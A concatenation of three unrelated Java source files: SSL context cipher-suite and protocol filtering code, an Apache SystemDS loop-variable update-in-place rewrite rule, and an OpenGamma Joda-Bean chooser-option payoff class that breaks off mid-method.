List<Configurer<SSLSocket>> getSSLSocketFactorySSLSocketConfigurers(SSLContext context) { final List<String> enabledCipherSuites = this.getCipherSuites() == null ? null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite()); final Patterns enabledCipherSuitePatterns; final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns(); if (this.getCipherSuitesFilter() != null) { enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns(); } else { enabledCipherSuitePatterns = null; } /// final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol()); final Patterns enabledSecureSocketProtocolsPatterns; final Patterns defaultEnabledSecureSocketProtocolsPatterns = this.getDefaultSecureSocketProcotolFilter().getPatterns(); if (this.getSecureSocketProtocolsFilter() != null) { enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns(); } else { enabledSecureSocketProtocolsPatterns = null; } // final boolean allowPassthrough = getAllowPassthrough(); ////// Configurer<SSLSocket> sslSocketConfigurer = new Configurer<SSLSocket>() { @Override public SSLSocket configure(SSLSocket socket) { Collection<String> filteredCipherSuites = BaseSSLContextParameters.this .filter(enabledCipherSuites, Arrays.asList(socket.getSSLParameters().getCipherSuites()), Arrays.asList(socket.getEnabledCipherSuites()), enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_SOCKET_CIPHER_SUITE_LOG_MSG, new Object[] {socket, enabledCipherSuites, enabledCipherSuitePatterns, socket.getSSLParameters().getCipherSuites(), socket.getEnabledCipherSuites(), defaultEnabledCipherSuitePatterns, filteredCipherSuites}); } socket.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()])); Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this .filter(enabledSecureSocketProtocols, Arrays.asList(socket.getSSLParameters().getProtocols()), Arrays.asList(socket.getEnabledProtocols()), enabledSecureSocketProtocolsPatterns, defaultEnabledSecureSocketProtocolsPatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_SOCKET_PROTOCOL_LOG_MSG, new Object[] {socket, enabledSecureSocketProtocols, enabledSecureSocketProtocolsPatterns, socket.getSSLParameters().getProtocols(), socket.getEnabledProtocols(), defaultEnabledSecureSocketProtocolsPatterns, filteredSecureSocketProtocols}); } socket.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()])); return socket; } }; List<Configurer<SSLSocket>> sslSocketConfigurers = new LinkedList<Configurer<SSLSocket>>(); sslSocketConfigurers.add(sslSocketConfigurer); return sslSocketConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLServerSocket} in order * to fully configure it in compliance with the provided configuration * options. These configurers are intended for sockets produced by a * {@link SSLServerSocketFactory}, see * {@link #getSSLSocketFactorySSLSocketConfigurers(SSLContext)} for * configurers related to sockets produced by a * {@link SSLSocketFactory}. The configurers are to be applied in * the order in which they appear in the list. * * @param context the context that serves as the factory for * {@code SSLServerSocketFactory} instances * @return the needed configurers */ protected List<Configurer<SSLServerSocket>> getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext context) { final List<String> enabledCipherSuites = this.getCipherSuites() == null ? null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite()); final Patterns enabledCipherSuitePatterns; final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns(); if (this.getCipherSuitesFilter() != null) { enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns(); } else { enabledCipherSuitePatterns = null; } /// final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol()); final Patterns enabledSecureSocketProtocolsPatterns; final Patterns defaultEnabledSecureSocketProtocolsPatterns = this.getDefaultSecureSocketProcotolFilter().getPatterns(); if (this.getSecureSocketProtocolsFilter() != null) { enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns(); } else { enabledSecureSocketProtocolsPatterns = null; } // final boolean allowPassthrough = getAllowPassthrough(); ////// Configurer<SSLServerSocket> sslServerSocketConfigurer = new Configurer<SSLServerSocket>() { @Override public SSLServerSocket configure(SSLServerSocket socket) { Collection<String> filteredCipherSuites = BaseSSLContextParameters.this .filter(enabledCipherSuites, Arrays.asList(socket.getSupportedCipherSuites()), Arrays.asList(socket.getEnabledCipherSuites()), enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_SERVER_SOCKET_CIPHER_SUITE_LOG_MSG, new Object[] {socket, enabledCipherSuites, enabledCipherSuitePatterns, socket.getSupportedCipherSuites(), socket.getEnabledCipherSuites(), defaultEnabledCipherSuitePatterns, filteredCipherSuites}); } socket.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()])); Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this .filter(enabledSecureSocketProtocols, Arrays.asList(socket.getSupportedProtocols()), Arrays.asList(socket.getEnabledProtocols()), enabledSecureSocketProtocolsPatterns, defaultEnabledSecureSocketProtocolsPatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_SERVER_SOCKET_PROTOCOL_LOG_MSG, new Object[] {socket, enabledSecureSocketProtocols, enabledSecureSocketProtocolsPatterns, socket.getSupportedProtocols(), socket.getEnabledProtocols(), defaultEnabledSecureSocketProtocolsPatterns, filteredSecureSocketProtocols}); } socket.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()])); return socket; } }; List<Configurer<SSLServerSocket>> sslServerSocketConfigurers = new LinkedList<Configurer<SSLServerSocket>>(); sslServerSocketConfigurers.add(sslServerSocketConfigurer); return sslServerSocketConfigurers; } /** * Configures a {@link SSLSessionContext}, client or server, with the supplied session timeout. * * @param sessionContext the context to configure * @param sessionTimeout the timeout time period * @throws GeneralSecurityException if {@code sessionContext} is {@code null} */ protected void configureSessionContext( SSLSessionContext sessionContext, String sessionTimeout) throws GeneralSecurityException { int sessionTimeoutInt = Integer.parseInt(this.parsePropertyValue(sessionTimeout)); if (sessionContext != null) { sessionContext.setSessionTimeout(sessionTimeoutInt); } else { throw new GeneralSecurityException( "The SSLContext does not support SSLSessionContext, " + "but a session timeout is configured. Set sessionTimeout to null " + "to avoid this error."); } } /** * Filters the values in {@code availableValues} returning only the values that * are explicitly listed in {@code explicitValues} (returns them regardless * of if they appear in {@code availableValues} or not) if {@code explicitValues} is not * {@code null} or according to the following rules: * <ol> * <li>Match the include patterns in {@code patterns} and don't match the exclude patterns in {@code patterns} * if patterns is not {@code null}.</li> * <li>Match the include patterns in {@code defaultPatterns} and don't match the exclude patterns in {@code defaultPatterns} * if patterns is {@code null} and {@code applyDefaults} is true.</li> * <li>Are provided in currentValues if if patterns is {@code null} and {@code applyDefaults} is false.</li> * </ol> * * @param explicitValues the optional explicit values to use * @param availableValues the available values to filter from * @param patterns the optional patterns to use when {@code explicitValues} is not used * @param defaultPatterns the required patterns to use when {@code explicitValues} and {@code patterns} are not used * @param applyDefaults flag indicating whether or not to apply defaults in the event that no explicit values and no * patterns apply * * @return the filtered values * * @see #filter(Collection, Collection, List, List) */ protected Collection<String> filter( Collection<String> explicitValues, Collection<String> availableValues, Collection<String> currentValues, Patterns patterns, Patterns defaultPatterns, boolean applyDefaults) { final List<Pattern> enabledIncludePatterns; final List<Pattern> enabledExcludePatterns; if (explicitValues == null && patterns == null && !applyDefaults) { return currentValues; } if (patterns != null) { enabledIncludePatterns = patterns.getIncludes(); enabledExcludePatterns = patterns.getExcludes(); } else { enabledIncludePatterns = defaultPatterns.getIncludes(); enabledExcludePatterns = defaultPatterns.getExcludes(); } return this.filter( explicitValues, availableValues, enabledIncludePatterns, enabledExcludePatterns); } /** * Filters the values in {@code availableValues} returning only the values that * are explicitly listed in {@code explicitValues} (returns them regardless * of if they appear in {@code availableValues} or not) if {@code explicitValues} is not * {@code null} or as match the patterns in {@code includePatterns} and do * not match the patterns in {@code excludePatterns} if {@code explicitValues} is {@code null}. * * @param explicitValues the optional explicit values to use * @param availableValues the available values to filter from if {@code explicitValues} is {@code null} * @param includePatterns the patterns to use for inclusion filtering, required if {@code explicitValues} is {@code null} * @param excludePatterns the patterns to use for exclusion filtering, required if {@code explicitValues} is {@code null} * * @return the filtered values */ protected Collection<String> filter(Collection<String> explicitValues, Collection<String> availableValues, List<Pattern> includePatterns, List<Pattern> excludePatterns) { Collection<String> returnValues; // Explicit list has precedence over filters, even when the list is // empty. if (explicitValues != null) { returnValues = new ArrayList<String>(explicitValues); } else { returnValues = new LinkedList<String>(); for (String value : availableValues) { if (this.matchesOneOf(value, includePatterns) && !this.matchesOneOf(value, excludePatterns)) { returnValues.add(value); } } } return returnValues; } /** * Returns true if and only if the value is matched by one or more of the supplied patterns. * * @param value the value to match * @param patterns the patterns to try to match against */ protected boolean matchesOneOf(String value, List<Pattern> patterns) { boolean matches = false; for (Pattern pattern : patterns) { Matcher matcher = pattern.matcher(value); if (matcher.matches()) { matches = true; break; } } return matches; } /** * Configures a {@code T} based on the related configuration options. */ interface Configurer<T> { /** * Configures a {@code T} based on the related configuration options. * The return value from this method may be {@code object} or it * may be a decorated instance there of. Consequently, any subsequent * actions on {@code object} must be performed using the returned value. * * @param object the object to configure * @return {@code object} or a decorated instance there of */ T configure(T object); } /** * Makes a decorated {@link SSLContext} appear as a normal {@code SSLContext}. */ protected static final class SSLContextDecorator extends SSLContext { public SSLContextDecorator(SSLContextSpiDecorator decorator) { super(decorator, decorator.getDelegate().getProvider(), decorator.getDelegate().getProtocol()); LOG.debug("SSLContextDecorator [{}] decorating SSLContext [{}].", this, decorator.getDelegate()); } @Override public String toString() { return String.format("SSLContext[hash=%h, provider=%s, protocol=%s, needClientAuth=%s, " + "wantClientAuth=%s\n\tdefaultProtocols=%s\n\tdefaultChiperSuites=%s\n\tsupportedProtocols=%s\n\tsupportedChiperSuites=%s\n]", hashCode(), getProvider(), getProtocol(), getDefaultSSLParameters().getNeedClientAuth(), getDefaultSSLParameters().getWantClientAuth(), collectionAsCommaDelimitedString(getDefaultSSLParameters().getProtocols()), collectionAsCommaDelimitedString(getDefaultSSLParameters().getCipherSuites()), collectionAsCommaDelimitedString(getSupportedSSLParameters().getProtocols()), collectionAsCommaDelimitedString(getSupportedSSLParameters().getCipherSuites())); } } /** * Class needed to provide decoration of an existing {@link SSLContext}. * Since {@code SSLContext} is an abstract class and requires an instance of * {@link SSLContextSpi}, this class effectively wraps an * {@code SSLContext} as if it were an {@code SSLContextSpi}, allowing us to * achieve decoration. */ protected static final class SSLContextSpiDecorator extends SSLContextSpi { private final SSLContext context; private final List<Configurer<SSLEngine>> sslEngineConfigurers; private final List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers; private final List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers; public SSLContextSpiDecorator(SSLContext context, List<Configurer<SSLEngine>> sslEngineConfigurers, List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers, List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers) { this.context = context; this.sslEngineConfigurers = sslEngineConfigurers; this.sslSocketFactoryConfigurers = sslSocketFactoryConfigurers; this.sslServerSocketFactoryConfigurers = sslServerSocketFactoryConfigurers; } @Override protected SSLEngine engineCreateSSLEngine() { SSLEngine engine = this.context.createSSLEngine(); LOG.debug("SSLEngine [{}] created from SSLContext [{}].", engine, context); this.configureSSLEngine(engine); return engine; } @Override protected SSLEngine engineCreateSSLEngine(String peerHost, int peerPort) { SSLEngine engine = this.context.createSSLEngine(peerHost, peerPort); LOG.debug("SSLEngine [{}] created from SSLContext [{}].", engine, context); return this.configureSSLEngine(engine); } @Override protected SSLSessionContext engineGetClientSessionContext() { return this.context.getClientSessionContext(); } @Override protected SSLSessionContext engineGetServerSessionContext() { return this.context.getServerSessionContext(); } @Override protected SSLServerSocketFactory engineGetServerSocketFactory() { SSLServerSocketFactory factory = this.context.getServerSocketFactory(); LOG.debug("SSLServerSocketFactoryEngine [{}] created from SSLContext [{}].", factory, context); return this.configureSSLServerSocketFactory(factory); } @Override protected SSLSocketFactory engineGetSocketFactory() { SSLSocketFactory factory = this.context.getSocketFactory(); LOG.debug("SSLSocketFactory [{}] created from SSLContext [{}].", factory, context); return this.configureSSLSocketFactory(factory); } @Override protected void engineInit(KeyManager[] km, TrustManager[] tm, SecureRandom random) throws KeyManagementException { this.context.init(km, tm, random); } protected SSLContext getDelegate() { return this.context; } /** * Configures an {@link SSLEngine} based on the configurers in instance. * The return value from this method may be {@code engine} or it may be * a decorated instance there of. Consequently, any subsequent actions * on {@code engine} must be performed using the returned value. * * @param engine the engine to configure * @return {@code engine} or a decorated instance there of */ protected SSLEngine configureSSLEngine(SSLEngine engine) { SSLEngine workingEngine = engine; for (Configurer<SSLEngine> configurer : this.sslEngineConfigurers) { workingEngine = configurer.configure(workingEngine); } return workingEngine; } /** * Configures an {@link SSLSocketFactory} based on the configurers in * this instance. The return value from this method may be * {@code factory} or it may be a decorated instance there of. * Consequently, any subsequent actions on {@code factory} must be * performed using the returned value. * * @param factory the factory to configure * @return {@code factory} or a decorated instance there of */ protected SSLSocketFactory configureSSLSocketFactory(SSLSocketFactory factory) { SSLSocketFactory workingFactory = factory; for (Configurer<SSLSocketFactory> configurer : this.sslSocketFactoryConfigurers) { workingFactory = configurer.configure(workingFactory); } return workingFactory; } /** * Configures an {@link SSLServerSocketFactory} based on the * configurers in this instance. The return value from this method may be * {@code factory} or it may be a decorated instance there of. * Consequently, any subsequent actions on {@code factory} must be * performed using the returned value. * * @param factory the factory to configure * @return {@code factory} or a decorated instance there of */ protected SSLServerSocketFactory configureSSLServerSocketFactory( SSLServerSocketFactory factory) { SSLServerSocketFactory workingFactory = factory; for (Configurer<SSLServerSocketFactory> configurer : this.sslServerSocketFactoryConfigurers) { workingFactory = configurer.configure(workingFactory); } return workingFactory; } } /** * A decorator that enables the application of configuration options to be * applied to created sockets even after this factory has been created and * turned over to client code. */ protected static final class SSLServerSocketFactoryDecorator extends SSLServerSocketFactory { private final SSLServerSocketFactory sslServerSocketFactory; private final List<Configurer<SSLServerSocket>> sslServerSocketConfigurers; public SSLServerSocketFactoryDecorator(SSLServerSocketFactory sslServerSocketFactory, List<Configurer<SSLServerSocket>> sslServerSocketConfigurers) { this.sslServerSocketFactory = sslServerSocketFactory; this.sslServerSocketConfigurers = sslServerSocketConfigurers; } @Override public String[] getDefaultCipherSuites() { return this.sslServerSocketFactory.getDefaultCipherSuites(); } @Override public String[] getSupportedCipherSuites() { return this.sslServerSocketFactory.getSupportedCipherSuites(); } @Override public ServerSocket createServerSocket() throws IOException { return this.configureSocket(this.sslServerSocketFactory.createServerSocket()); } @Override public ServerSocket createServerSocket(int port, int backlog, InetAddress ifAddress) throws IOException { return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port, backlog, ifAddress)); } @Override public ServerSocket createServerSocket(int port, int backlog) throws IOException { return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port, backlog)); } @Override public ServerSocket createServerSocket(int port) throws IOException { return this.configureSocket(this.sslServerSocketFactory.createServerSocket(port)); } public SSLServerSocketFactory getDelegate() { return this.sslServerSocketFactory; } private ServerSocket configureSocket(ServerSocket s) { SSLServerSocket workingSocket = (SSLServerSocket) s; LOG.debug("Created ServerSocket [{}] from SslServerSocketFactory [{}].", s, sslServerSocketFactory); for (Configurer<SSLServerSocket> configurer : this.sslServerSocketConfigurers) { workingSocket = configurer.configure(workingSocket); } return workingSocket; } } /** * A decorator that enables the application of configuration options to be * applied to created sockets even after this factory has been created and * turned over to client code. */ protected static final class SSLSocketFactoryDecorator extends SSLSocketFactory { private final SSLSocketFactory sslSocketFactory; private final List<Configurer<SSLSocket>> sslSocketConfigurers; public SSLSocketFactoryDecorator(SSLSocketFactory sslSocketFactory, List<Configurer<SSLSocket>> sslSocketConfigurers) { this.sslSocketFactory = sslSocketFactory; this.sslSocketConfigurers = sslSocketConfigurers; } @Override public String[] getDefaultCipherSuites() { return sslSocketFactory.getDefaultCipherSuites(); } @Override public String[] getSupportedCipherSuites() { return sslSocketFactory.getSupportedCipherSuites(); } @Override public Socket createSocket() throws IOException { return configureSocket(sslSocketFactory.createSocket()); } @Override public Socket createSocket(Socket s, String host, int port, boolean autoClose) throws IOException, UnknownHostException { return configureSocket(sslSocketFactory.createSocket(s, host, port, autoClose)); } @Override public Socket createSocket(String host, int port) throws IOException, UnknownHostException { return configureSocket(sslSocketFactory.createSocket(host, port)); } @Override public Socket createSocket(String host, int port, InetAddress localHost, int localPort) throws IOException, UnknownHostException { return configureSocket(sslSocketFactory.createSocket(host, port, localHost, localPort)); } @Override public Socket createSocket(InetAddress host, int port) throws IOException { return configureSocket(sslSocketFactory.createSocket(host, port)); } @Override public Socket createSocket(InetAddress address, int port, InetAddress localAddress, int localPort) throws IOException { return configureSocket(sslSocketFactory.createSocket(address, port, localAddress, localPort)); } public SSLSocketFactory getDelegate() { return this.sslSocketFactory; } private Socket configureSocket(Socket s) { SSLSocket workingSocket = (SSLSocket) s; LOG.debug("Created Socket [{}] from SocketFactory [{}].", s, sslSocketFactory); for (Configurer<SSLSocket> configurer : this.sslSocketConfigurers) { workingSocket = configurer.configure(workingSocket); } return workingSocket; } } private static String createCipherSuiteLogMessage(String entityName) { return "Configuring " + entityName + " [{}] with " + LS + "\t explicitly set cipher suites [{}]," + LS + "\t cipher suite patterns [{}]," + LS + "\t available cipher suites [{}]," + LS + "\t currently enabled cipher suites [{}]," + LS + "\t and default cipher suite patterns [{}]." + LS + "\t Resulting enabled cipher suites are [{}]."; } private static String createProtocolLogMessage(String entityName) { return "Configuring " + entityName + " [{}] with " + LS + "\t explicitly set protocols [{}]," + LS + "\t protocol patterns [{}]," + LS + "\t available protocols [{}]," + LS + "\t currently enabled protocols [{}]," + LS + "\t and default protocol patterns [{}]." + LS + "\t Resulting enabled protocols are [{}]."; } }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sysds.hops.rewrite; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import org.apache.sysds.api.DMLScript; import org.apache.sysds.common.Types.ExecMode; import org.apache.sysds.common.Types.OpOp1; import org.apache.sysds.common.Types.OpOpData; import org.apache.sysds.hops.DataOp; import org.apache.sysds.hops.FunctionOp; import org.apache.sysds.hops.Hop; import org.apache.sysds.hops.LeftIndexingOp; import org.apache.sysds.hops.UnaryOp; import org.apache.sysds.parser.ForStatement; import org.apache.sysds.parser.ForStatementBlock; import org.apache.sysds.parser.IfStatement; import org.apache.sysds.parser.IfStatementBlock; import org.apache.sysds.parser.StatementBlock; import org.apache.sysds.parser.VariableSet; import org.apache.sysds.parser.WhileStatement; import org.apache.sysds.parser.WhileStatementBlock; import org.apache.sysds.common.Types.DataType; /** * Rule: Mark loop variables that are only read/updated through cp left indexing * for update in-place. * */ public class RewriteMarkLoopVariablesUpdateInPlace extends StatementBlockRewriteRule { @Override public boolean createsSplitDag() { return false; } @Override public List<StatementBlock> rewriteStatementBlock(StatementBlock sb, ProgramRewriteStatus status) { if( DMLScript.getGlobalExecMode() == ExecMode.SPARK ) { // nothing to do here, return original statement block return Arrays.asList(sb); } if( sb instanceof WhileStatementBlock || sb instanceof ForStatementBlock ) //incl parfor { ArrayList<String> candidates = new ArrayList<>(); VariableSet updated = sb.variablesUpdated(); VariableSet liveout = sb.liveOut(); for( String varname : updated.getVariableNames() ) { if( updated.getVariable(varname).getDataType()==DataType.MATRIX && liveout.containsVariable(varname) ) //exclude local vars { if( sb instanceof WhileStatementBlock ) { WhileStatement wstmt = (WhileStatement) sb.getStatement(0); if( rIsApplicableForUpdateInPlace(wstmt.getBody(), varname) ) candidates.add(varname); } else if( sb instanceof ForStatementBlock ) { ForStatement wstmt = (ForStatement) sb.getStatement(0); if( rIsApplicableForUpdateInPlace(wstmt.getBody(), varname) ) candidates.add(varname); } } } sb.setUpdateInPlaceVars(candidates); } //return modified statement block return Arrays.asList(sb); } private boolean rIsApplicableForUpdateInPlace( ArrayList<StatementBlock> sbs, String varname ) { //NOTE: no function statement blocks / predicates considered because function call would //render variable as not applicable and predicates don't allow assignments; further reuse //of loop candidates as child blocks already processed //recursive invocation boolean ret = true; for( StatementBlock sb : sbs ) { if( !sb.variablesRead().containsVariable(varname) && !sb.variablesUpdated().containsVariable(varname) ) continue; //valid wrt update-in-place if( sb instanceof WhileStatementBlock || sb instanceof ForStatementBlock ) { ret &= sb.getUpdateInPlaceVars().contains(varname); } else if( sb instanceof IfStatementBlock ) { IfStatementBlock isb = (IfStatementBlock) sb; IfStatement istmt = (IfStatement)isb.getStatement(0); ret &= rIsApplicableForUpdateInPlace(istmt.getIfBody(), varname); if( ret && istmt.getElseBody() != null ) ret &= rIsApplicableForUpdateInPlace(istmt.getElseBody(), varname); } else { if( sb.getHops() != null ) if( !isApplicableForUpdateInPlace(sb.getHops(), varname) ) for( Hop hop : sb.getHops() ) ret &= isApplicableForUpdateInPlace(hop, varname); } //early abort if not applicable if( !ret ) break; } return ret; } private static boolean isApplicableForUpdateInPlace(Hop hop, String varname) { // check erroneously marking a variable for update-in-place // that is written to by a function return value if(hop instanceof FunctionOp && ((FunctionOp)hop).containsOutput(varname)) return false; //NOTE: single-root-level validity check if( !hop.getName().equals(varname) ) return true; //valid if read/updated by leftindexing //CP exec type not evaluated here as no lops generated yet boolean validLix = probeLixRoot(hop, varname); //valid if only safe consumers of left indexing input if( validLix ) { for( Hop p : hop.getInput().get(0).getInput().get(0).getParent() ) { validLix &= ( p == hop.getInput().get(0) //lix || (p instanceof UnaryOp && ((UnaryOp)p).getOp()==OpOp1.NROW) || (p instanceof UnaryOp && ((UnaryOp)p).getOp()==OpOp1.NCOL)); } } return validLix; } private static boolean isApplicableForUpdateInPlace(ArrayList<Hop> hops, String varname) { //NOTE: additional DAG-level validity check // check single LIX update which is direct root-child to varname assignment Hop bLix = null; for( Hop hop : hops ) { if( probeLixRoot(hop, varname) ) { if( bLix != null ) return false; //invalid bLix = hop.getInput().get(0); } } // check all other roots independent of varname boolean valid = true; Hop.resetVisitStatus(hops); for( Hop hop : hops ) if( hop.getInput().get(0) != bLix ) valid &= rProbeOtherRoot(hop, varname); Hop.resetVisitStatus(hops); return valid; } private static boolean probeLixRoot(Hop root, String varname) { return root instanceof DataOp && root.isMatrix() && root.getInput().get(0).isMatrix() && root.getInput().get(0) instanceof LeftIndexingOp && root.getInput().get(0).getInput().get(0) instanceof DataOp && root.getInput().get(0).getInput().get(0).getName().equals(varname); } private static boolean rProbeOtherRoot(Hop hop, String varname) { if( hop.isVisited() ) return false; boolean valid = !(hop instanceof LeftIndexingOp) && !(HopRewriteUtils.isData(hop, OpOpData.TRANSIENTREAD) && hop.getName().equals(varname)); for( Hop c : hop.getInput() ) valid &= rProbeOtherRoot(c, varname); hop.setVisited(); return valid; } @Override public List<StatementBlock> rewriteStatementBlocks(List<StatementBlock> sbs, ProgramRewriteStatus sate) { return sbs; } }
/** * Copyright (C) 2009 - present by OpenGamma Inc. and the OpenGamma group of companies * * Please see distribution for license. */ package com.opengamma.financial.security.option; import java.util.Map; import org.joda.beans.Bean; import org.joda.beans.BeanBuilder; import org.joda.beans.BeanDefinition; import org.joda.beans.JodaBeanUtils; import org.joda.beans.MetaProperty; import org.joda.beans.Property; import org.joda.beans.PropertyDefinition; import org.joda.beans.impl.direct.DirectBeanBuilder; import org.joda.beans.impl.direct.DirectMetaProperty; import org.joda.beans.impl.direct.DirectMetaPropertyMap; import org.threeten.bp.ZonedDateTime; import com.opengamma.util.time.Expiry; /** * The simple chooser payoff style. */ @BeanDefinition public class SimpleChooserPayoffStyle extends PayoffStyle { /** Serialization version. */ private static final long serialVersionUID = 1L; /** * The choose date. */ @PropertyDefinition(validate = "notNull") private ZonedDateTime _chooseDate; /** * The underlying strike. */ @PropertyDefinition private double _underlyingStrike; /** * The underlying expiry. */ @PropertyDefinition(validate = "notNull") private Expiry _underlyingExpiry; /** * Creates an instance. */ private SimpleChooserPayoffStyle() { } /** * Creates an instance. * * @param chooseDate the choose date, not null * @param underlyingStrike the underlying strike * @param underlyingExpiry the underlying expiry, not null */ public SimpleChooserPayoffStyle(final ZonedDateTime chooseDate, final double underlyingStrike, final Expiry underlyingExpiry) { setChooseDate(chooseDate); setUnderlyingStrike(underlyingStrike); setUnderlyingExpiry(underlyingExpiry); } //------------------------------------------------------------------------- @Override public <T> T accept(final PayoffStyleVisitor<T> visitor) { return visitor.visitSimpleChooserPayoffStyle(this); } //------------------------- AUTOGENERATED START ------------------------- ///CLOVER:OFF /** * The meta-bean for {@code SimpleChooserPayoffStyle}. * @return the meta-bean, not null */ public static SimpleChooserPayoffStyle.Meta meta() { return SimpleChooserPayoffStyle.Meta.INSTANCE; } static { JodaBeanUtils.registerMetaBean(SimpleChooserPayoffStyle.Meta.INSTANCE); } @Override public SimpleChooserPayoffStyle.Meta metaBean() { return SimpleChooserPayoffStyle.Meta.INSTANCE; } //----------------------------------------------------------------------- /** * Gets the choose date. * @return the value of the property, not null */ public ZonedDateTime getChooseDate() { return _chooseDate; } /** * Sets the choose date. * @param chooseDate the new value of the property, not null */ public void setChooseDate(ZonedDateTime chooseDate) { JodaBeanUtils.notNull(chooseDate, "chooseDate"); this._chooseDate = chooseDate; } /** * Gets the the {@code chooseDate} property. * @return the property, not null */ public final Property<ZonedDateTime> chooseDate() { return metaBean().chooseDate().createProperty(this); } //----------------------------------------------------------------------- /** * Gets the underlying strike. * @return the value of the property */ public double getUnderlyingStrike() { return _underlyingStrike; } /** * Sets the underlying strike. * @param underlyingStrike the new value of the property */ public void setUnderlyingStrike(double underlyingStrike) { this._underlyingStrike = underlyingStrike; } /** * Gets the the {@code underlyingStrike} property. * @return the property, not null */ public final Property<Double> underlyingStrike() { return metaBean().underlyingStrike().createProperty(this); } //----------------------------------------------------------------------- /** * Gets the underlying expiry. * @return the value of the property, not null */ public Expiry getUnderlyingExpiry() { return _underlyingExpiry; } /** * Sets the underlying expiry. * @param underlyingExpiry the new value of the property, not null */ public void setUnderlyingExpiry(Expiry underlyingExpiry) { JodaBeanUtils.notNull(underlyingExpiry, "underlyingExpiry"); this._underlyingExpiry = underlyingExpiry; } /** * Gets the the {@code underlyingExpiry} property. * @return the property, not null */ public final Property<Expiry> underlyingExpiry() { return metaBean().underlyingExpiry().createProperty(this); } //----------------------------------------------------------------------- @Override public SimpleChooserPayoffStyle clone() { return JodaBeanUtils.cloneAlways(this); } @Override public boolean equals(Object obj) { if (obj == this) { return true; } if (obj != null && obj.getClass() == this.getClass()) { SimpleChooserPayoffStyle other = (SimpleChooserPayoffStyle) obj; return JodaBeanUtils.equal(getChooseDate(), other.getChooseDate()) && JodaBeanUtils.equal(getUnderlyingStrike(), other.getUnderlyingStrike()) && JodaBeanUtils.equal(getUnderlyingExpiry(), other.getUnderlyingExpiry()) && super.equals(obj); } return false; } @Override public int hashCode() { int hash = 7; hash = hash * 31 + JodaBeanUtils.hashCode(getChooseDate()); hash = hash * 31 + JodaBeanUtils.hashCode(getUnderlyingStrike()); hash = hash * 31 + JodaBeanUtils.hashCode(getUnderlyingExpiry()); return hash ^ super.hashCode(); } @Override public String toString() { StringBuilder buf = new StringBuilder(128); buf.append("SimpleChooserPayoffStyle{"); int len = buf.length(); toString(buf); if (buf.length() > len) { buf.setLength(buf.length() - 2); } buf.append('}'); return buf.toString(); } @Override protected void toString(StringBuilder buf) { super.toString(buf); buf.append("chooseDate").append('=').append(JodaBeanUtils.toString(getChooseDate())).append(',').append(' '); buf.append("underlyingStrike").append('=').append(JodaBeanUtils.toString(getUnderlyingStrike())).append(',').append(' '); buf.append("underlyingExpiry").append('=').append(JodaBeanUtils.toString(getUnderlyingExpiry())).append(',').append(' '); } //----------------------------------------------------------------------- /** * The meta-bean for {@code SimpleChooserPayoffStyle}. */ public static class Meta extends PayoffStyle.Meta { /** * The singleton instance of the meta-bean. */ static final Meta INSTANCE = new Meta(); /** * The meta-property for the {@code chooseDate} property. */ private final MetaProperty<ZonedDateTime> _chooseDate = DirectMetaProperty.ofReadWrite( this, "chooseDate", SimpleChooserPayoffStyle.class, ZonedDateTime.class); /** * The meta-property for the {@code underlyingStrike} property. */ private final MetaProperty<Double> _underlyingStrike = DirectMetaProperty.ofReadWrite( this, "underlyingStrike", SimpleChooserPayoffStyle.class, Double.TYPE); /** * The meta-property for the {@code underlyingExpiry} property. */ private final MetaProperty<Expiry> _underlyingExpiry = DirectMetaProperty.ofReadWrite( this, "underlyingExpiry", SimpleChooserPayoffStyle.class, Expiry.class); /** * The meta-properties. */ private final Map<String, MetaProperty<?>> _metaPropertyMap$ = new DirectMetaPropertyMap( this, (DirectMetaPropertyMap) super.metaPropertyMap(), "chooseDate", "underlyingStrike", "underlyingExpiry"); /** * Restricted constructor. */ protected Meta() { } @Override protected MetaProperty<?> metaPropertyGet(String propertyName) { switch (propertyName.hashCode()) { case 2023159397: // chooseDate return _chooseDate; case 205707631: // underlyingStrike return _underlyingStrike; case -191465744: // 